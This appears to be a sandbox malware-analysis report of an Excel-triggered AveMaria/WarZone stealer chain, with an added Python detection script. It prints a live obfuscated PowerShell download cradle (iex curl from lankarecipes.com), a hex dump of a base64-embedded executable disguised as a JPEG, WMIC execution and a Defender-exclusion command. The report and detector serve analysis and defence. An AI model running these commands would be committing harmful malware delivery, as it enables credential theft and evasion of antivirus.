    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
    Host: lankarecipes.com
    Connection: Keep-Alive
Jan 8, 2021 09:34:53.435033083 CET | 111 | IN | HTTP/1.1 200 OK
    Date: Fri, 08 Jan 2021 08:34:53 GMT
    Server: Apache
    Upgrade: h2,h2c
    Connection: Upgrade, Keep-Alive
    Last-Modified: Wed, 06 Jan 2021 16:11:54 GMT
    Accept-Ranges: bytes
    Content-Length: 453227
    Keep-Alive: timeout=5, max=75
    Content-Type: image/jpeg
                                                                                                                                                                                                    Data Raw: 20 53 45 54 2d 45 58 65 43 55 74 49 6f 6e 50 6f 6c 69 43 79 20 42 79 70 41 53 73 20 2d 73 43 6f 70 65 20 50 52 6f 43 45 53 73 20 2d 46 4f 72 43 45 20 3b 20 24 6b 61 45 43 43 66 6c 68 41 6e 56 56 20 3d 20 27 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 30 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 41 33 59 73 54 61 63 77 4f 71 69 58 4d 44 71 6f 6c 7a 41 36 71 4a 38 42 2b 6b 69 58 49 44 71 6f 6c 46 4a 61 65 4a 63 67 4f 71 69 54 77 68 6f 34 6c 32 41 36 71 4a 63 77 4f 71 69 58 45 44 71 6f 6c 53 61 57 4e 6f 63 77 4f 71 69 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 46 42 46 41 41 42 4d 41 51 55 41 37 4e 2f 31 58 77 41 41 41 41 41 41 41 41 41 41 34 41 41 4f 41 51 73 42 42 67 41 41 38 41 4d 41 41 47 41 41 41 41 41 41 41 41 41 63 45 67 41 41 41 42 41 41 41 41 41 41 42 41 41 41 41 45 41 41 41 42 41 41 41 41 41 51 41 41 41 45 41 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 48 41 45 41 41 41 51 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 41 45 41 41 41 45 41 41 41 41 41 41 51 41 41 41 51 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 54 41 4d 45 41 46 41 41 41 41 41 41 4d 41 51 41 61 43 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 41 51 41 2f 41 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 42 30 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4c 6e 52 6c 65 48 51 41 41 41 41 55 37 67 4d 41 41 42 41 41 41 41 44 77 41 77 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 59 43 35 79 5a 47 46 30 59 51 41 41 2f 41 6b 41 41 41 41 41 42 41 41 41 45 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 41 45 41 75 5a 47 46 30 59 51 41 41 41 45 67 56 41 41 41 41 45 41 51 41 41 42 41 41 41 41 41 51 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 44 41 4c 6e 4a 7a 63 6d 4d 41 41 41 42 6f 4c 41 41 41 41 44 41 45 41 41 41 77 41 41 41 41 49 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 51 43 35 79 5a 57 78 76 59 77 41 41 2b 67 73 41 41 41 42 67 42 41 41 41 45 41 41 41 41 46 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 41 45 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
    Data Ascii: SET-EXeCUtIonPoliCy BypASs -sCope PRoCESs -FOrCE ; $kaECCflhAnVV = '[...]
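The HTTP exchange above is the security-relevant point of this section: the file the cmd.exe/powershell.exe command line (listed under System Behavior) fetches as /mages.jpg is served with Content-Type: image/jpeg, yet the Data Raw hex shows the body opening with PowerShell text, and the quoted base64 literal it assigns begins with TVqQAAMAAAAEAAAA, which decodes to an MZ/DOS header, so the "image" is a script carrying an embedded executable. The following Python is an added example, not code from the Joe Sandbox report: it re-derives those two facts from a transcription of the report's hex dump (cut after the first 36 base64 characters of the blob) and applies the normalisation a detection rule needs on the mangled command line. The token patterns and the case-flip heuristic are this example's own choices, not signatures taken from the report.

```python
"""Detection checks over this report's artifacts (added example, not Joe
Sandbox code): content-type vs. magic-byte mismatch on the staged payload,
recovery of the base64-embedded PE, and normalisation of the obfuscated
cmd.exe/powershell.exe command line."""
import base64
import re

# Constructed sample: the leading bytes of the "image/jpeg" response body,
# transcribed from the report's Data Raw hex dump and cut after the first
# 36 base64 characters of the embedded blob.
RAW_HEX = (
    "20 53 45 54 2d 45 58 65 43 55 74 49 6f 6e 50 6f 6c 69 43 79 20 42 79 70 41 53 73 "
    "20 2d 73 43 6f 70 65 20 50 52 6f 43 45 53 73 20 2d 46 4f 72 43 45 20 3b 20 24 6b "
    "61 45 43 43 66 6c 68 41 6e 56 56 20 3d 20 27 54 56 71 51 41 41 4d 41 41 41 41 45 "
    "41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41"
)

# The cmd.exe command line recorded under System Behavior, copied from the report.
CMDLINE = ("CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 "
           "iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))")

JPEG_MAGIC = b"\xff\xd8\xff"   # every JPEG starts with an SOI marker
MZ_MAGIC = b"MZ"               # every PE starts with a DOS header


def body_from_hex(hex_dump: str) -> bytes:
    """Turn a space-separated hex dump into the raw body bytes."""
    return bytes.fromhex(hex_dump)


def content_type_mismatch(declared: str, body: bytes) -> bool:
    """True when the server claims image/jpeg but the body has no JPEG magic."""
    return declared.lower().startswith("image/jpeg") and not body.startswith(JPEG_MAGIC)


def embedded_pe_from_b64(text: str):
    """Return the decoded bytes of the first base64 run that starts with an MZ
    header, or None. The run is trimmed to a multiple of four characters so a
    truncated blob (as in the report's dump) still decodes."""
    for run in re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", text):
        run = run[: len(run) - len(run) % 4]
        try:
            decoded = base64.b64decode(run, validate=True)
        except ValueError:
            continue
        if decoded.startswith(MZ_MAGIC):
            return decoded
    return None


_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def normalize_cmdline(cmd: str) -> str:
    """Lower-case the command line and fold 'a' + 'b' concatenations so the
    real URL and switches are visible to plain string matching."""
    s = cmd.lower()
    while True:
        folded = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", s)
        if folded == s:
            return re.sub(r"\s+", " ", s).strip()
        s = folded


# Matched against the normalised (lower-case, folded) command line.
SUSPICIOUS = {
    "exec-policy-bypass": re.compile(r"-e[xp]?\w*\s+bypass"),
    "no-profile": re.compile(r"-nop\w*"),
    "hidden-window": re.compile(r"-w\w*\s+(?:1|h\w*)"),
    "invoke-expression": re.compile(r"\biex\b|invoke-expression"),
    "download-cradle": re.compile(r"\b(?:curl|iwr|wget|invoke-webrequest|downloadstring)\b"),
}


def max_case_flips(cmd: str) -> int:
    """Largest number of lower->upper transitions inside one word, a proxy for
    the 'PowerShell case anomaly' the report flags: a normal -ExecutionPolicy
    has one flip, hand-mangled poWeRSheLL has several."""
    best = 0
    for word in re.findall(r"[A-Za-z]{4,}", cmd):
        flips = sum(1 for a, b in zip(word, word[1:]) if a.islower() and b.isupper())
        best = max(best, flips)
    return best


def analyse_cmdline(cmd: str) -> dict:
    """Return the normalised line, the suspicious tokens found, URLs and case flips."""
    norm = normalize_cmdline(cmd)
    return {
        "normalized": norm,
        "hits": sorted(k for k, rx in SUSPICIOUS.items() if rx.search(norm)),
        "urls": re.findall(r"https?://[^\s'\")]+", norm),
        "case_flips": max_case_flips(cmd),
    }


if __name__ == "__main__":
    body = body_from_hex(RAW_HEX)
    print("content-type mismatch:", content_type_mismatch("image/jpeg", body))
    pe = embedded_pe_from_b64(body.decode("latin-1"))
    print("embedded PE header:", pe[:8].hex() if pe else None)
    print(analyse_cmdline(CMDLINE))
```

Run stand-alone it reports the mismatch, prints the recovered DOS header bytes (4d5a9000...) and lists the folded URL together with the five cradle tokens. The concatenation fold matters because `'...mages.jp' + 'g'` defeats a naive match on the URL or on `.jpg`; the case-flip count is what separates `poWeRSheLL` from a legitimate `-ExecutionPolicy Bypass` invocation, which has a single flip.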


Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 09:34:20
Start date: 08/01/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0xb0000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:34:25
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
                                                                                                                                                                                                    Imagebase:0x11d0000
                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:34:26
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff724c50000
                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:34:26
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
                                                                                                                                                                                                    Imagebase:0x880000
                                                                                                                                                                                                    File size:430592 bytes
                                                                                                                                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000003.00000003.759722473.00000000061E3000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000003.00000003.739726186.000000000071D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:34:58
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline'
                                                                                                                                                                                                    Imagebase:0x12e0000
                                                                                                                                                                                                    File size:2170976 bytes
                                                                                                                                                                                                    MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:34:59
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES578D.tmp' 'c:\Users\user\AppData\Local\Temp\mvqape5o\CSCDBDF9420C89B4C89B070DDF57D28F899.TMP'
                                                                                                                                                                                                    Imagebase:0xa40000
                                                                                                                                                                                                    File size:43176 bytes
                                                                                                                                                                                                    MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:35:04
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Windows\system32\cmd.exe' /c COpY /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
                                                                                                                                                                                                    Imagebase:0x11d0000
                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:35:05
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Windows\system32\cmd.exe' /c Wmic PROcEss CALl creaTe %TEMP%\Test3.jpg
                                                                                                                                                                                                    Imagebase:0x11d0000
                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:35:06
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:Wmic PROcEss CALl creaTe C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                                                                    Imagebase:0xd90000
                                                                                                                                                                                                    File size:391680 bytes
                                                                                                                                                                                                    MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:35:07
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:339293 bytes
                                                                                                                                                                                                    MD5 hash:DD27F33FCD6F1FA4C67EE05D836795C2
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:Visual Basic
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000000.764732381.0000000000443000.00000002.00020000.sdmp, Author: Florian Roth
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000002.783515823.0000000002C2F000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: AveMaria_WarZone, Description: unknown, Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, Author: unknown
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp, Author: Florian Roth
• Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\Test3.jpg, Author: Florian Roth
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\Test3.jpg, Author: Florian Roth
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: low

General

Start time: 09:35:14
Start date: 08/01/2021
Path: C:\Users\user\AppData\Local\Temp\Test3.jpg
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\Test3.jpg
Imagebase: 0x400000
File size: 339293 bytes
MD5 hash: DD27F33FCD6F1FA4C67EE05D836795C2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000003.785520059.000000000062B000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000002.946480583.0000000003465000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000000.780781628.0000000000443000.00000002.00020000.sdmp, Author: Florian Roth
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000003.785553106.000000000062C000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000002.946136847.0000000002B8F000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000002.939727802.000000000054F000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000003.785647201.000000000062C000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000013.00000001.781400247.000000000054F000.00000040.00020000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000013.00000003.785717468.000000000061D000.00000004.00000001.sdmp, Author: Joe Security
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: AveMaria_WarZone, Description: unknown, Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: AveMaria_WarZone, Description: unknown, Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, Author: unknown
• Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000013.00000003.785472155.000000000061D000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000013.00000003.786517856.0000000000619000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 09:35:17
Start date: 08/01/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell Add-MpPreference -ExclusionPath C:\
Imagebase: 0x880000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 09:35:17
Start date: 08/01/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\cmd.exe
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000016.00000002.944604602.0000000005292000.00000004.00000001.sdmp, Author: Florian Roth
Reputation: high

General

Start time: 09:35:17
Start date: 08/01/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:35:18
Start date: 08/01/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:35:32
Start date: 08/01/2021
Path: C:\Windows\System32\drivers\rdpvideominiport.sys
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff732050000
File size: 30616 bytes
MD5 hash: 0600DF60EF88FD10663EC84709E5E245
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 09:35:34
Start date: 08/01/2021
Path: C:\Windows\System32\drivers\rdpdr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size: 182784 bytes
MD5 hash: 52A6CC99F5934CFAE88353C47B6193E7
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:09:35:35
                                                                                                                                                                                                    Start date:08/01/2021
                                                                                                                                                                                                    Path:C:\Windows\system32\drivers\tsusbhub.sys
                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                    Commandline:
                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                    File size:126464 bytes
                                                                                                                                                                                                    MD5 hash:3A84A09CBC42148A0C7D00B3E82517F1
                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                    Programmed in:C, C++ or other language

Disassembly

Code Analysis
